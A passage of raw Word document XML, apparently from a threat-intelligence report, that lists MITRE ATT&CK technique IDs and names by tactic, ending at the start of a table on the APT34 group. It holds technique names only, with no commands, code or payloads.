    <w:p w14:paraId="3ED31219"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T1555.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Credentials from Password Stores&gt;:Windows Credential Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426A167C" w14:textId="77777777" w:rsidR="004374DD" w:rsidRPr="00CB71E5" w:rsidRDefault="004374DD" w:rsidP="004374DD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB71E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1555.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB71E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Credentials from Password Stores&gt;:Credentials from Web Browsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AED5EDF"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1555 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credentials from Password Stores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5D8A51"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T1003.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:Cached Domain Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429048A0"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T1003.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:LSA Secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343EFE10"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T1552.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Unsecured Credentials&gt;:Credentials In Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA580C7"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1110 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4A51BF"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T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2EE52E"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T1003.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:LSASS Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1AD28D"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lastRenderedPageBreak/>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery ['T1120', 'T1497.001', 'T1069.002', 'T1087.001', 'T1201', 'T1046', 'T1033', 'T1007', 'T1082', 'T1049', 'T1069.001', 'T1016', 'T1012', 'T1087.002', 'T1057']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0C57F1"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1120 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Peripheral Device Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2796A7F9"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T1497.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Virtualization/Sandbox Evasion&gt;:System Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B6B2C1"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T1069.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Permission Groups Discovery&gt;:Domain Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F471E6"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T1087.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Account Discovery&gt;:Local Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC271F3"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1201 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Password Policy Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9A589C"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1046 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4630A3" w14:textId="77777777" w:rsidR="004374DD" w:rsidRPr="00490881" w:rsidRDefault="004374DD" w:rsidP="004374DD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00490881">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00490881">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1033 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00490881">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Owner/User Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C4C07F"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1007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3819958A" w14:textId="77777777" w:rsidR="004374DD" w:rsidRPr="00EE29C0" w:rsidRDefault="004374DD" w:rsidP="004374DD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE29C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EE29C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1082 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EE29C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Information Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488A9AF6"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1049 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Connections Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0867A251"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T1069.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Permission Groups Discovery&gt;:Local Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACAB3D4"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1016 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Configuration Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D617A8C"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1012 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Query Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA71EFB"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T1087.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Account Discovery&gt;:Domain Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095C6006"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1057 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DC7BAE"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement ['T1021.004', 'T1021.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20819037"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T1021.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258644D4"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T1021.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:Remote Desktop Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0B515C"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection ['T1113', 'T1056.001', 'T1119']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3CEFD1"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1113 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Screen Capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C90402"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T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ABADE5"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1119 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Automated Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3B1D0F"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1071.004', 'T1572', 'T1573.002', 'T1105', 'T1008', 'T1071.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D68D62"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T1071.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FAC6A2"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1572 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Protocol </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tunneling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0DA3337C"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T1573.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Encrypted Channel&gt;:Asymmetric Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FACEA0"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r w:rsidRPr="00CB71E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB71E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1105 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB71E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D59AE7"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Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Fallback Channels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A47466"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8D7F76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1071.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008D7F76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611236C8" w14:textId="77777777" w:rsidR="004374DD" w:rsidRPr="004374DD"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration ['T1048.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CC8CAC" w14:textId="77777777" w:rsidR="004374DD" w:rsidRPr="004374DD" w:rsidRDefault="004374DD" w:rsidP="004374DD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1048.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Exfiltration Over Alternative Protocol&gt;:Exfiltration Over Unencrypted Non-C2 Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A949AD" w14:textId="4C3D592E" w:rsidR="00063FEC" w:rsidRPr="005935F8" w:rsidRDefault="004374DD" w:rsidP="004374DD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact []</w:t>
      </w:r>
      <w:r w:rsidR="00063FEC" w:rsidRPr="005935F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E4CEEB" w14:textId="429A8CF1" w:rsidR="00063FEC" w:rsidRDefault="00C96489" w:rsidP="00063FEC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc153480898"/>
      <w:r w:rsidRPr="00C96489">
        <w:t>Hard Pass: Declining APT34’s Invite to Join Their Professional Network</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p w14:paraId="0BE2E0C5" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="00063FEC">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063FEC" w:rsidRPr="002D1D50" w14:paraId="7751720C" w14:textId="77777777" w:rsidTr="002F6F9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19D59F6A" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="125" w:name="OLE_LINK16"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="335161AD" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="002D1D50" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="541CFE37" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="00387DCC" w:rsidRDefault="00063FEC" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
